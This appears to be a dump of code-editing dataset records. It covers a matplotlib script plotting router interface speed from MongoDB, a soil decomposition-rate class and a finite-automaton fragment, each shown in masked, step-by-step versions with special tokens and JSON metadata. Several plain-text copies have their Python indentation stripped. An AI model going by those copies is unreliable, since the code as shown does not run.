ax.yaxis.set_major_formatter(mtick.FormatStrFormatter('%d'))
x = []
y = []
for time, speed in speed_time_info:
x.append(time)
y.append(speed)
plt.title('路由器' + interface + '接口,' + direction + '方向,' + str(last_time
) + '分钟速率')
plt.xlabel('采集时间')
plt.ylabel('速率kbps')
fig.autofmt_xdate()
ax.plot(x, y, linestyle='solid', color='r', label='R1')
ax.legend(loc='upper left')
plt.show()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def mat_line(speed_time_info, interface, direction, last_time):
fig = plt.figure(figsize=(6, 6))
ax = fig.add_subplot(111)
import matplotlib.dates as mdate
ax.xaxis.set_major_formatter(mdate.DateFormatter('%H:%M:%S'))
import matplotlib.ticker as mtick
ax.yaxis.set_major_formatter(mtick.FormatStrFormatter('%d'))
x = []
y = []
for time, speed in speed_time_info:
x.append(time)
y.append(speed)
plt.title('路由器' + interface + '接口,' + direction + '方向,' + str(last_time
) + '分钟速率')
plt.xlabel('采集时间')
plt.ylabel('速率kbps')
fig.autofmt_xdate()
ax.plot(x, y, linestyle='solid', color='r', label='R1')
ax.legend(loc='upper left')
plt.show()
if __name__ == '__main__':
list_info = ['GigabitEthernet1', 'out', 2]
time_recode, speed = get_info_from_mongodb(*list_info)
speed_time_info = list(zip(time_recode, speed))
mat_line(speed_time_info, list_info[0], list_info[1], list_info[2])
<|reserved_special_token_1|>
<|reserved_special_token_0|>
plt.rcParams['font.sans-serif'] = ['SimHei']
plt.rcParams['font.family'] = 'sans-serif'
def mat_line(speed_time_info, interface, direction, last_time):
fig = plt.figure(figsize=(6, 6))
ax = fig.add_subplot(111)
import matplotlib.dates as mdate
ax.xaxis.set_major_formatter(mdate.DateFormatter('%H:%M:%S'))
import matplotlib.ticker as mtick
ax.yaxis.set_major_formatter(mtick.FormatStrFormatter('%d'))
x = []
y = []
for time, speed in speed_time_info:
x.append(time)
y.append(speed)
plt.title('路由器' + interface + '接口,' + direction + '方向,' + str(last_time
) + '分钟速率')
plt.xlabel('采集时间')
plt.ylabel('速率kbps')
fig.autofmt_xdate()
ax.plot(x, y, linestyle='solid', color='r', label='R1')
ax.legend(loc='upper left')
plt.show()
if __name__ == '__main__':
list_info = ['GigabitEthernet1', 'out', 2]
time_recode, speed = get_info_from_mongodb(*list_info)
speed_time_info = list(zip(time_recode, speed))
mat_line(speed_time_info, list_info[0], list_info[1], list_info[2])
<|reserved_special_token_1|>
from matplotlib import pyplot as plt
from read_and_calculate_speed import get_info_from_mongodb
plt.rcParams['font.sans-serif'] = ['SimHei']
plt.rcParams['font.family'] = 'sans-serif'
def mat_line(speed_time_info, interface, direction, last_time):
fig = plt.figure(figsize=(6, 6))
ax = fig.add_subplot(111)
import matplotlib.dates as mdate
ax.xaxis.set_major_formatter(mdate.DateFormatter('%H:%M:%S'))
import matplotlib.ticker as mtick
ax.yaxis.set_major_formatter(mtick.FormatStrFormatter('%d'))
x = []
y = []
for time, speed in speed_time_info:
x.append(time)
y.append(speed)
plt.title('路由器' + interface + '接口,' + direction + '方向,' + str(last_time
) + '分钟速率')
plt.xlabel('采集时间')
plt.ylabel('速率kbps')
fig.autofmt_xdate()
ax.plot(x, y, linestyle='solid', color='r', label='R1')
ax.legend(loc='upper left')
plt.show()
if __name__ == '__main__':
list_info = ['GigabitEthernet1', 'out', 2]
time_recode, speed = get_info_from_mongodb(*list_info)
speed_time_info = list(zip(time_recode, speed))
mat_line(speed_time_info, list_info[0], list_info[1], list_info[2])
<|reserved_special_token_1|>
from matplotlib import pyplot as plt
from read_and_calculate_speed import get_info_from_mongodb
plt.rcParams['font.sans-serif'] = ['SimHei']
plt.rcParams['font.family'] = 'sans-serif'
def mat_line(speed_time_info, interface, direction, last_time):
# 调节图形大小,宽,高
fig = plt.figure(figsize=(6, 6))
# 一共一行,每行一图,第一图
ax = fig.add_subplot(111)
# 处理X轴时间格式
import matplotlib.dates as mdate
# 设置时间标签显示格式
# ax.xaxis.set_major_formatter(mdate.DateFormatter('%Y-%m-%d %H:%M:%S'))
ax.xaxis.set_major_formatter(mdate.DateFormatter('%H:%M:%S'))
# 处理Y轴百分比格式
import matplotlib.ticker as mtick
ax.yaxis.set_major_formatter(mtick.FormatStrFormatter('%d'))
# ax.set_ylim(0, 100) # 控制Y轴的取值范围
# 把cpu_usage_list的数据,拆分为x轴的时间,与y轴的利用率
x = []
y = []
for time, speed in speed_time_info:
x.append(time)
y.append(speed)
# 添加主题和注释
plt.title('路由器' + interface + '接口,' + direction + '方向,' + str(last_time) + '分钟速率')
plt.xlabel('采集时间')
plt.ylabel('速率kbps')
# 当x轴太拥挤的时候可以让他自适应
fig.autofmt_xdate()
# 实线红色
ax.plot(x, y, linestyle='solid', color='r', label='R1')
# 虚线黑色
# ax.plot(x, y, linestyle='dashed', color='b', label='R1')
# 如果你有两套数据,完全可以在一幅图中绘制双线
# ax.plot(x2, y2, linestyle='dashed', color='b', label='R1')
# 设置说明的位置
ax.legend(loc='upper left')
# 绘制图形
plt.show()
if __name__ == '__main__':
list_info = ['GigabitEthernet1', 'out', 2]
# 获取数据库两分钟内的信息
time_recode, speed = get_info_from_mongodb(*list_info)
speed_time_info = list(zip(time_recode, speed))
# 绘图
mat_line(speed_time_info, list_info[0], list_info[1], list_info[2])
|
flexible
|
{
"blob_id": "0aa419b0045914b066fbec457c918d83276f2583",
"index": 3556,
"step-1": "<mask token>\n\n\ndef mat_line(speed_time_info, interface, direction, last_time):\n fig = plt.figure(figsize=(6, 6))\n ax = fig.add_subplot(111)\n import matplotlib.dates as mdate\n ax.xaxis.set_major_formatter(mdate.DateFormatter('%H:%M:%S'))\n import matplotlib.ticker as mtick\n ax.yaxis.set_major_formatter(mtick.FormatStrFormatter('%d'))\n x = []\n y = []\n for time, speed in speed_time_info:\n x.append(time)\n y.append(speed)\n plt.title('路由器' + interface + '接口,' + direction + '方向,' + str(last_time\n ) + '分钟速率')\n plt.xlabel('采集时间')\n plt.ylabel('速率kbps')\n fig.autofmt_xdate()\n ax.plot(x, y, linestyle='solid', color='r', label='R1')\n ax.legend(loc='upper left')\n plt.show()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef mat_line(speed_time_info, interface, direction, last_time):\n fig = plt.figure(figsize=(6, 6))\n ax = fig.add_subplot(111)\n import matplotlib.dates as mdate\n ax.xaxis.set_major_formatter(mdate.DateFormatter('%H:%M:%S'))\n import matplotlib.ticker as mtick\n ax.yaxis.set_major_formatter(mtick.FormatStrFormatter('%d'))\n x = []\n y = []\n for time, speed in speed_time_info:\n x.append(time)\n y.append(speed)\n plt.title('路由器' + interface + '接口,' + direction + '方向,' + str(last_time\n ) + '分钟速率')\n plt.xlabel('采集时间')\n plt.ylabel('速率kbps')\n fig.autofmt_xdate()\n ax.plot(x, y, linestyle='solid', color='r', label='R1')\n ax.legend(loc='upper left')\n plt.show()\n\n\nif __name__ == '__main__':\n list_info = ['GigabitEthernet1', 'out', 2]\n time_recode, speed = get_info_from_mongodb(*list_info)\n speed_time_info = list(zip(time_recode, speed))\n mat_line(speed_time_info, list_info[0], list_info[1], list_info[2])\n",
"step-3": "<mask token>\nplt.rcParams['font.sans-serif'] = ['SimHei']\nplt.rcParams['font.family'] = 'sans-serif'\n\n\ndef mat_line(speed_time_info, interface, direction, last_time):\n fig = plt.figure(figsize=(6, 6))\n ax = fig.add_subplot(111)\n import matplotlib.dates as mdate\n ax.xaxis.set_major_formatter(mdate.DateFormatter('%H:%M:%S'))\n import matplotlib.ticker as mtick\n ax.yaxis.set_major_formatter(mtick.FormatStrFormatter('%d'))\n x = []\n y = []\n for time, speed in speed_time_info:\n x.append(time)\n y.append(speed)\n plt.title('路由器' + interface + '接口,' + direction + '方向,' + str(last_time\n ) + '分钟速率')\n plt.xlabel('采集时间')\n plt.ylabel('速率kbps')\n fig.autofmt_xdate()\n ax.plot(x, y, linestyle='solid', color='r', label='R1')\n ax.legend(loc='upper left')\n plt.show()\n\n\nif __name__ == '__main__':\n list_info = ['GigabitEthernet1', 'out', 2]\n time_recode, speed = get_info_from_mongodb(*list_info)\n speed_time_info = list(zip(time_recode, speed))\n mat_line(speed_time_info, list_info[0], list_info[1], list_info[2])\n",
"step-4": "from matplotlib import pyplot as plt\nfrom read_and_calculate_speed import get_info_from_mongodb\nplt.rcParams['font.sans-serif'] = ['SimHei']\nplt.rcParams['font.family'] = 'sans-serif'\n\n\ndef mat_line(speed_time_info, interface, direction, last_time):\n fig = plt.figure(figsize=(6, 6))\n ax = fig.add_subplot(111)\n import matplotlib.dates as mdate\n ax.xaxis.set_major_formatter(mdate.DateFormatter('%H:%M:%S'))\n import matplotlib.ticker as mtick\n ax.yaxis.set_major_formatter(mtick.FormatStrFormatter('%d'))\n x = []\n y = []\n for time, speed in speed_time_info:\n x.append(time)\n y.append(speed)\n plt.title('路由器' + interface + '接口,' + direction + '方向,' + str(last_time\n ) + '分钟速率')\n plt.xlabel('采集时间')\n plt.ylabel('速率kbps')\n fig.autofmt_xdate()\n ax.plot(x, y, linestyle='solid', color='r', label='R1')\n ax.legend(loc='upper left')\n plt.show()\n\n\nif __name__ == '__main__':\n list_info = ['GigabitEthernet1', 'out', 2]\n time_recode, speed = get_info_from_mongodb(*list_info)\n speed_time_info = list(zip(time_recode, speed))\n mat_line(speed_time_info, list_info[0], list_info[1], list_info[2])\n",
"step-5": "from matplotlib import pyplot as plt\nfrom read_and_calculate_speed import get_info_from_mongodb\n\nplt.rcParams['font.sans-serif'] = ['SimHei']\nplt.rcParams['font.family'] = 'sans-serif'\n\n\ndef mat_line(speed_time_info, interface, direction, last_time):\n # 调节图形大小,宽,高\n fig = plt.figure(figsize=(6, 6))\n # 一共一行,每行一图,第一图\n ax = fig.add_subplot(111)\n\n # 处理X轴时间格式\n import matplotlib.dates as mdate\n\n # 设置时间标签显示格式\n # ax.xaxis.set_major_formatter(mdate.DateFormatter('%Y-%m-%d %H:%M:%S'))\n ax.xaxis.set_major_formatter(mdate.DateFormatter('%H:%M:%S'))\n\n # 处理Y轴百分比格式\n import matplotlib.ticker as mtick\n ax.yaxis.set_major_formatter(mtick.FormatStrFormatter('%d'))\n # ax.set_ylim(0, 100) # 控制Y轴的取值范围\n\n # 把cpu_usage_list的数据,拆分为x轴的时间,与y轴的利用率\n x = []\n y = []\n\n for time, speed in speed_time_info:\n x.append(time)\n y.append(speed)\n\n # 添加主题和注释\n plt.title('路由器' + interface + '接口,' + direction + '方向,' + str(last_time) + '分钟速率')\n plt.xlabel('采集时间')\n plt.ylabel('速率kbps')\n\n # 当x轴太拥挤的时候可以让他自适应\n fig.autofmt_xdate()\n\n # 实线红色\n ax.plot(x, y, linestyle='solid', color='r', label='R1')\n # 虚线黑色\n # ax.plot(x, y, linestyle='dashed', color='b', label='R1')\n\n # 如果你有两套数据,完全可以在一幅图中绘制双线\n # ax.plot(x2, y2, linestyle='dashed', color='b', label='R1')\n\n # 设置说明的位置\n ax.legend(loc='upper left')\n\n # 绘制图形\n plt.show()\n\n\nif __name__ == '__main__':\n list_info = ['GigabitEthernet1', 'out', 2]\n # 获取数据库两分钟内的信息\n time_recode, speed = get_info_from_mongodb(*list_info)\n speed_time_info = list(zip(time_recode, speed))\n # 绘图\n mat_line(speed_time_info, list_info[0], list_info[1], list_info[2])\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
class DecompFactors(object):
<|reserved_special_token_0|>
def __init__(self, control, params, state, fluxes, met_data):
"""
Parameters
----------
control : integers, structure
model control flags
params: floats, structure
model parameters
state: floats, structure
model state
fluxes : floats, structure
model fluxes
met_data : floats, dictionary
meteorological forcing data
"""
self.params = params
self.fluxes = fluxes
self.control = control
self.state = state
self.met_data = met_data
self.wb = WaterBalance(self.control, self.params, self.state, self.
fluxes, self.met_data)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class DecompFactors(object):
""" Calculate C and N litter production rates """
def __init__(self, control, params, state, fluxes, met_data):
"""
Parameters
----------
control : integers, structure
model control flags
params: floats, structure
model parameters
state: floats, structure
model state
fluxes : floats, structure
model fluxes
met_data : floats, dictionary
meteorological forcing data
"""
self.params = params
self.fluxes = fluxes
self.control = control
self.state = state
self.met_data = met_data
self.wb = WaterBalance(self.control, self.params, self.state, self.
fluxes, self.met_data)
def decay_rates(self, project_day):
""" Model decay rates - temperature dependency (i.e. increase with temp)
[See section A8 in Comins and McMurtrie 1993].
Parameters:
-----------
project_day : int
current simulation day (index)
"""
tempact = self.soil_temp_factor(project_day)
wtfac = self.wb.calculate_soil_water_fac(topsoil=True)
self.params.decayrate[0] = self.params.kdec1 * math.exp(-3.0 * self
.params.ligshoot) * tempact * wtfac
self.params.decayrate[1] = self.params.kdec2 * tempact * wtfac
self.params.decayrate[2] = self.params.kdec3 * math.exp(-3.0 * self
.params.ligroot) * tempact * wtfac
self.params.decayrate[3] = self.params.kdec4 * tempact * wtfac
self.params.decayrate[4] = self.params.kdec5 * (1.0 - 0.75 * self.
params.finesoil) * tempact * wtfac
self.params.decayrate[5] = self.params.kdec6 * tempact * wtfac
self.params.decayrate[6] = self.params.kdec7 * tempact * wtfac
def soil_temp_factor(self, project_day):
"""Soil-temperature activity factor (A9).
Parameters:
-----------
project_day : int
current simulation day (index)
Returns:
--------
tfac : float
soil temperature factor [degC]
"""
tsoil = self.met_data['tsoil'][project_day]
if float_gt(tsoil, 0.0):
tfac = 0.0326 + 0.00351 * tsoil ** 1.652 - (tsoil / 41.748) ** 7.19
if float_lt(tfac, 0.0):
tfac = 0.0
else:
tfac = 0.0
return tfac
<|reserved_special_token_1|>
<|reserved_special_token_0|>
__author__ = 'Martin De Kauwe'
__version__ = '1.0 (25.02.2011)'
__email__ = 'mdekauwe@gmail.com'
class DecompFactors(object):
""" Calculate C and N litter production rates """
def __init__(self, control, params, state, fluxes, met_data):
"""
Parameters
----------
control : integers, structure
model control flags
params: floats, structure
model parameters
state: floats, structure
model state
fluxes : floats, structure
model fluxes
met_data : floats, dictionary
meteorological forcing data
"""
self.params = params
self.fluxes = fluxes
self.control = control
self.state = state
self.met_data = met_data
self.wb = WaterBalance(self.control, self.params, self.state, self.
fluxes, self.met_data)
def decay_rates(self, project_day):
""" Model decay rates - temperature dependency (i.e. increase with temp)
[See section A8 in Comins and McMurtrie 1993].
Parameters:
-----------
project_day : int
current simulation day (index)
"""
tempact = self.soil_temp_factor(project_day)
wtfac = self.wb.calculate_soil_water_fac(topsoil=True)
self.params.decayrate[0] = self.params.kdec1 * math.exp(-3.0 * self
.params.ligshoot) * tempact * wtfac
self.params.decayrate[1] = self.params.kdec2 * tempact * wtfac
self.params.decayrate[2] = self.params.kdec3 * math.exp(-3.0 * self
.params.ligroot) * tempact * wtfac
self.params.decayrate[3] = self.params.kdec4 * tempact * wtfac
self.params.decayrate[4] = self.params.kdec5 * (1.0 - 0.75 * self.
params.finesoil) * tempact * wtfac
self.params.decayrate[5] = self.params.kdec6 * tempact * wtfac
self.params.decayrate[6] = self.params.kdec7 * tempact * wtfac
def soil_temp_factor(self, project_day):
"""Soil-temperature activity factor (A9).
Parameters:
-----------
project_day : int
current simulation day (index)
Returns:
--------
tfac : float
soil temperature factor [degC]
"""
tsoil = self.met_data['tsoil'][project_day]
if float_gt(tsoil, 0.0):
tfac = 0.0326 + 0.00351 * tsoil ** 1.652 - (tsoil / 41.748) ** 7.19
if float_lt(tfac, 0.0):
tfac = 0.0
else:
tfac = 0.0
return tfac
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import math
from water_balance import WaterBalance
from utilities import float_eq, float_lt, float_le, float_gt, float_ge, clip
__author__ = 'Martin De Kauwe'
__version__ = '1.0 (25.02.2011)'
__email__ = 'mdekauwe@gmail.com'
class DecompFactors(object):
""" Calculate C and N litter production rates """
def __init__(self, control, params, state, fluxes, met_data):
"""
Parameters
----------
control : integers, structure
model control flags
params: floats, structure
model parameters
state: floats, structure
model state
fluxes : floats, structure
model fluxes
met_data : floats, dictionary
meteorological forcing data
"""
self.params = params
self.fluxes = fluxes
self.control = control
self.state = state
self.met_data = met_data
self.wb = WaterBalance(self.control, self.params, self.state, self.
fluxes, self.met_data)
def decay_rates(self, project_day):
""" Model decay rates - temperature dependency (i.e. increase with temp)
[See section A8 in Comins and McMurtrie 1993].
Parameters:
-----------
project_day : int
current simulation day (index)
"""
tempact = self.soil_temp_factor(project_day)
wtfac = self.wb.calculate_soil_water_fac(topsoil=True)
self.params.decayrate[0] = self.params.kdec1 * math.exp(-3.0 * self
.params.ligshoot) * tempact * wtfac
self.params.decayrate[1] = self.params.kdec2 * tempact * wtfac
self.params.decayrate[2] = self.params.kdec3 * math.exp(-3.0 * self
.params.ligroot) * tempact * wtfac
self.params.decayrate[3] = self.params.kdec4 * tempact * wtfac
self.params.decayrate[4] = self.params.kdec5 * (1.0 - 0.75 * self.
params.finesoil) * tempact * wtfac
self.params.decayrate[5] = self.params.kdec6 * tempact * wtfac
self.params.decayrate[6] = self.params.kdec7 * tempact * wtfac
def soil_temp_factor(self, project_day):
"""Soil-temperature activity factor (A9).
Parameters:
-----------
project_day : int
current simulation day (index)
Returns:
--------
tfac : float
soil temperature factor [degC]
"""
tsoil = self.met_data['tsoil'][project_day]
if float_gt(tsoil, 0.0):
tfac = 0.0326 + 0.00351 * tsoil ** 1.652 - (tsoil / 41.748) ** 7.19
if float_lt(tfac, 0.0):
tfac = 0.0
else:
tfac = 0.0
return tfac
<|reserved_special_token_1|>
""" Soil and water decomposition rates """
import math
from water_balance import WaterBalance
from utilities import float_eq, float_lt, float_le, float_gt, float_ge, clip
__author__ = "Martin De Kauwe"
__version__ = "1.0 (25.02.2011)"
__email__ = "mdekauwe@gmail.com"
class DecompFactors(object):
""" Calculate C and N litter production rates """
def __init__(self, control, params, state, fluxes, met_data):
"""
Parameters
----------
control : integers, structure
model control flags
params: floats, structure
model parameters
state: floats, structure
model state
fluxes : floats, structure
model fluxes
met_data : floats, dictionary
meteorological forcing data
"""
self.params = params
self.fluxes = fluxes
self.control = control
self.state = state
self.met_data = met_data
self.wb = WaterBalance(self.control, self.params, self.state,
self.fluxes, self.met_data)
def decay_rates(self, project_day):
""" Model decay rates - temperature dependency (i.e. increase with temp)
[See section A8 in Comins and McMurtrie 1993].
Parameters:
-----------
project_day : int
current simulation day (index)
"""
# temperature and water factors for decomposition
tempact = self.soil_temp_factor(project_day)
wtfac = self.wb.calculate_soil_water_fac(topsoil=True)
# decay rate of surface structural pool
self.params.decayrate[0] = (self.params.kdec1 *
math.exp(-3. * self.params.ligshoot) *
tempact * wtfac)
# decay rate of surface metabolic pool
self.params.decayrate[1] = self.params.kdec2 * tempact * wtfac
# decay rate of soil structural pool
self.params.decayrate[2] = (self.params.kdec3 *
math.exp(-3. * self.params.ligroot) *
tempact * wtfac)
# decay rate of soil metabolic pool
self.params.decayrate[3] = self.params.kdec4 * tempact * wtfac
# decay rate of active pool
self.params.decayrate[4] = (self.params.kdec5 *
(1.0 - 0.75 * self.params.finesoil) *
tempact * wtfac)
# decay rate of slow pool
self.params.decayrate[5] = self.params.kdec6 * tempact * wtfac
# decay rate of passive pool
self.params.decayrate[6] = self.params.kdec7 * tempact * wtfac
def soil_temp_factor(self, project_day):
"""Soil-temperature activity factor (A9).
Parameters:
-----------
project_day : int
current simulation day (index)
Returns:
--------
tfac : float
soil temperature factor [degC]
"""
tsoil = self.met_data['tsoil'][project_day]
if float_gt(tsoil, 0.0):
tfac = (0.0326 + 0.00351 * tsoil**1.652 - (tsoil / 41.748)**7.19)
if float_lt(tfac, 0.0):
tfac = 0.0
else:
# negative number cannot be raised to a fractional power
# number would need to be complex
tfac = 0.0
return tfac
|
flexible
|
{
"blob_id": "74f3b4001a0520a25a314ff537719b679ba0fca4",
"index": 2578,
"step-1": "<mask token>\n\n\nclass DecompFactors(object):\n <mask token>\n\n def __init__(self, control, params, state, fluxes, met_data):\n \"\"\"\n Parameters\n ----------\n control : integers, structure\n model control flags\n params: floats, structure\n model parameters\n state: floats, structure\n model state\n fluxes : floats, structure\n model fluxes\n met_data : floats, dictionary\n meteorological forcing data\n\n \"\"\"\n self.params = params\n self.fluxes = fluxes\n self.control = control\n self.state = state\n self.met_data = met_data\n self.wb = WaterBalance(self.control, self.params, self.state, self.\n fluxes, self.met_data)\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass DecompFactors(object):\n \"\"\" Calculate C and N litter production rates \"\"\"\n\n def __init__(self, control, params, state, fluxes, met_data):\n \"\"\"\n Parameters\n ----------\n control : integers, structure\n model control flags\n params: floats, structure\n model parameters\n state: floats, structure\n model state\n fluxes : floats, structure\n model fluxes\n met_data : floats, dictionary\n meteorological forcing data\n\n \"\"\"\n self.params = params\n self.fluxes = fluxes\n self.control = control\n self.state = state\n self.met_data = met_data\n self.wb = WaterBalance(self.control, self.params, self.state, self.\n fluxes, self.met_data)\n\n def decay_rates(self, project_day):\n \"\"\" Model decay rates - temperature dependency (i.e. increase with temp)\n [See section A8 in Comins and McMurtrie 1993].\n\n Parameters:\n -----------\n project_day : int\n current simulation day (index)\n\n \"\"\"\n tempact = self.soil_temp_factor(project_day)\n wtfac = self.wb.calculate_soil_water_fac(topsoil=True)\n self.params.decayrate[0] = self.params.kdec1 * math.exp(-3.0 * self\n .params.ligshoot) * tempact * wtfac\n self.params.decayrate[1] = self.params.kdec2 * tempact * wtfac\n self.params.decayrate[2] = self.params.kdec3 * math.exp(-3.0 * self\n .params.ligroot) * tempact * wtfac\n self.params.decayrate[3] = self.params.kdec4 * tempact * wtfac\n self.params.decayrate[4] = self.params.kdec5 * (1.0 - 0.75 * self.\n params.finesoil) * tempact * wtfac\n self.params.decayrate[5] = self.params.kdec6 * tempact * wtfac\n self.params.decayrate[6] = self.params.kdec7 * tempact * wtfac\n\n def soil_temp_factor(self, project_day):\n \"\"\"Soil-temperature activity factor (A9).\n\n Parameters:\n -----------\n project_day : int\n current simulation day (index)\n\n Returns:\n --------\n tfac : float\n soil temperature factor [degC]\n\n \"\"\"\n tsoil = self.met_data['tsoil'][project_day]\n if float_gt(tsoil, 0.0):\n tfac = 0.0326 + 0.00351 * tsoil ** 1.652 - (tsoil / 41.748) ** 7.19\n if float_lt(tfac, 0.0):\n tfac = 0.0\n else:\n tfac = 0.0\n return tfac\n",
"step-3": "<mask token>\n__author__ = 'Martin De Kauwe'\n__version__ = '1.0 (25.02.2011)'\n__email__ = 'mdekauwe@gmail.com'\n\n\nclass DecompFactors(object):\n \"\"\" Calculate C and N litter production rates \"\"\"\n\n def __init__(self, control, params, state, fluxes, met_data):\n \"\"\"\n Parameters\n ----------\n control : integers, structure\n model control flags\n params: floats, structure\n model parameters\n state: floats, structure\n model state\n fluxes : floats, structure\n model fluxes\n met_data : floats, dictionary\n meteorological forcing data\n\n \"\"\"\n self.params = params\n self.fluxes = fluxes\n self.control = control\n self.state = state\n self.met_data = met_data\n self.wb = WaterBalance(self.control, self.params, self.state, self.\n fluxes, self.met_data)\n\n def decay_rates(self, project_day):\n \"\"\" Model decay rates - temperature dependency (i.e. increase with temp)\n [See section A8 in Comins and McMurtrie 1993].\n\n Parameters:\n -----------\n project_day : int\n current simulation day (index)\n\n \"\"\"\n tempact = self.soil_temp_factor(project_day)\n wtfac = self.wb.calculate_soil_water_fac(topsoil=True)\n self.params.decayrate[0] = self.params.kdec1 * math.exp(-3.0 * self\n .params.ligshoot) * tempact * wtfac\n self.params.decayrate[1] = self.params.kdec2 * tempact * wtfac\n self.params.decayrate[2] = self.params.kdec3 * math.exp(-3.0 * self\n .params.ligroot) * tempact * wtfac\n self.params.decayrate[3] = self.params.kdec4 * tempact * wtfac\n self.params.decayrate[4] = self.params.kdec5 * (1.0 - 0.75 * self.\n params.finesoil) * tempact * wtfac\n self.params.decayrate[5] = self.params.kdec6 * tempact * wtfac\n self.params.decayrate[6] = self.params.kdec7 * tempact * wtfac\n\n def soil_temp_factor(self, project_day):\n \"\"\"Soil-temperature activity factor (A9).\n\n Parameters:\n -----------\n project_day : int\n current simulation day (index)\n\n Returns:\n --------\n tfac : float\n soil temperature factor [degC]\n\n \"\"\"\n tsoil = self.met_data['tsoil'][project_day]\n if float_gt(tsoil, 0.0):\n tfac = 0.0326 + 0.00351 * tsoil ** 1.652 - (tsoil / 41.748) ** 7.19\n if float_lt(tfac, 0.0):\n tfac = 0.0\n else:\n tfac = 0.0\n return tfac\n",
"step-4": "<mask token>\nimport math\nfrom water_balance import WaterBalance\nfrom utilities import float_eq, float_lt, float_le, float_gt, float_ge, clip\n__author__ = 'Martin De Kauwe'\n__version__ = '1.0 (25.02.2011)'\n__email__ = 'mdekauwe@gmail.com'\n\n\nclass DecompFactors(object):\n \"\"\" Calculate C and N litter production rates \"\"\"\n\n def __init__(self, control, params, state, fluxes, met_data):\n \"\"\"\n Parameters\n ----------\n control : integers, structure\n model control flags\n params: floats, structure\n model parameters\n state: floats, structure\n model state\n fluxes : floats, structure\n model fluxes\n met_data : floats, dictionary\n meteorological forcing data\n\n \"\"\"\n self.params = params\n self.fluxes = fluxes\n self.control = control\n self.state = state\n self.met_data = met_data\n self.wb = WaterBalance(self.control, self.params, self.state, self.\n fluxes, self.met_data)\n\n def decay_rates(self, project_day):\n \"\"\" Model decay rates - temperature dependency (i.e. increase with temp)\n [See section A8 in Comins and McMurtrie 1993].\n\n Parameters:\n -----------\n project_day : int\n current simulation day (index)\n\n \"\"\"\n tempact = self.soil_temp_factor(project_day)\n wtfac = self.wb.calculate_soil_water_fac(topsoil=True)\n self.params.decayrate[0] = self.params.kdec1 * math.exp(-3.0 * self\n .params.ligshoot) * tempact * wtfac\n self.params.decayrate[1] = self.params.kdec2 * tempact * wtfac\n self.params.decayrate[2] = self.params.kdec3 * math.exp(-3.0 * self\n .params.ligroot) * tempact * wtfac\n self.params.decayrate[3] = self.params.kdec4 * tempact * wtfac\n self.params.decayrate[4] = self.params.kdec5 * (1.0 - 0.75 * self.\n params.finesoil) * tempact * wtfac\n self.params.decayrate[5] = self.params.kdec6 * tempact * wtfac\n self.params.decayrate[6] = self.params.kdec7 * tempact * wtfac\n\n def soil_temp_factor(self, project_day):\n \"\"\"Soil-temperature activity factor (A9).\n\n Parameters:\n -----------\n project_day : int\n current simulation day (index)\n\n Returns:\n --------\n tfac : float\n soil temperature factor [degC]\n\n \"\"\"\n tsoil = self.met_data['tsoil'][project_day]\n if float_gt(tsoil, 0.0):\n tfac = 0.0326 + 0.00351 * tsoil ** 1.652 - (tsoil / 41.748) ** 7.19\n if float_lt(tfac, 0.0):\n tfac = 0.0\n else:\n tfac = 0.0\n return tfac\n",
"step-5": "\"\"\" Soil and water decomposition rates \"\"\"\n\nimport math\n\nfrom water_balance import WaterBalance\nfrom utilities import float_eq, float_lt, float_le, float_gt, float_ge, clip\n\n__author__ = \"Martin De Kauwe\"\n__version__ = \"1.0 (25.02.2011)\"\n__email__ = \"mdekauwe@gmail.com\"\n\n\nclass DecompFactors(object):\n \"\"\" Calculate C and N litter production rates \"\"\"\n def __init__(self, control, params, state, fluxes, met_data):\n \"\"\"\n Parameters\n ----------\n control : integers, structure\n model control flags\n params: floats, structure\n model parameters\n state: floats, structure\n model state\n fluxes : floats, structure\n model fluxes\n met_data : floats, dictionary\n meteorological forcing data\n\n \"\"\"\n self.params = params\n self.fluxes = fluxes\n self.control = control\n self.state = state\n self.met_data = met_data\n\n self.wb = WaterBalance(self.control, self.params, self.state,\n self.fluxes, self.met_data)\n\n def decay_rates(self, project_day):\n \"\"\" Model decay rates - temperature dependency (i.e. increase with temp)\n [See section A8 in Comins and McMurtrie 1993].\n\n Parameters:\n -----------\n project_day : int\n current simulation day (index)\n\n \"\"\"\n # temperature and water factors for decomposition\n tempact = self.soil_temp_factor(project_day)\n wtfac = self.wb.calculate_soil_water_fac(topsoil=True)\n\n # decay rate of surface structural pool\n self.params.decayrate[0] = (self.params.kdec1 *\n math.exp(-3. * self.params.ligshoot) *\n tempact * wtfac)\n\n # decay rate of surface metabolic pool\n self.params.decayrate[1] = self.params.kdec2 * tempact * wtfac\n\n\n # decay rate of soil structural pool\n self.params.decayrate[2] = (self.params.kdec3 *\n math.exp(-3. * self.params.ligroot) *\n tempact * wtfac)\n\n # decay rate of soil metabolic pool\n self.params.decayrate[3] = self.params.kdec4 * tempact * wtfac\n\n\n # decay rate of active pool\n self.params.decayrate[4] = (self.params.kdec5 *\n (1.0 - 0.75 * self.params.finesoil) *\n tempact * wtfac)\n\n # decay rate of slow pool\n self.params.decayrate[5] = self.params.kdec6 * tempact * wtfac\n\n # decay rate of passive pool\n self.params.decayrate[6] = self.params.kdec7 * tempact * wtfac\n\n def soil_temp_factor(self, project_day):\n \"\"\"Soil-temperature activity factor (A9).\n\n Parameters:\n -----------\n project_day : int\n current simulation day (index)\n\n Returns:\n --------\n tfac : float\n soil temperature factor [degC]\n\n \"\"\"\n tsoil = self.met_data['tsoil'][project_day]\n\n if float_gt(tsoil, 0.0):\n tfac = (0.0326 + 0.00351 * tsoil**1.652 - (tsoil / 41.748)**7.19)\n if float_lt(tfac, 0.0):\n tfac = 0.0\n else:\n # negative number cannot be raised to a fractional power\n # number would need to be complex\n tfac = 0.0\n\n return tfac\n",
"step-ids": [
2,
5,
6,
7,
8
]
}
|
[
2,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
def finite_automate(word: str) ->str:
"""Реализация конечного автомата для проверки символьных строк"""
state: str = INITIAL_STATE
for ind, char in enumerate(word):
yield f'{word[ind:]} --> {state}'
state = RULE.get((state, char))
if not state:
break
if state in FINAL_STATE:
yield 'Цепочка принадлежит языку'
else:
yield 'Цепочка не принадлежит языку'
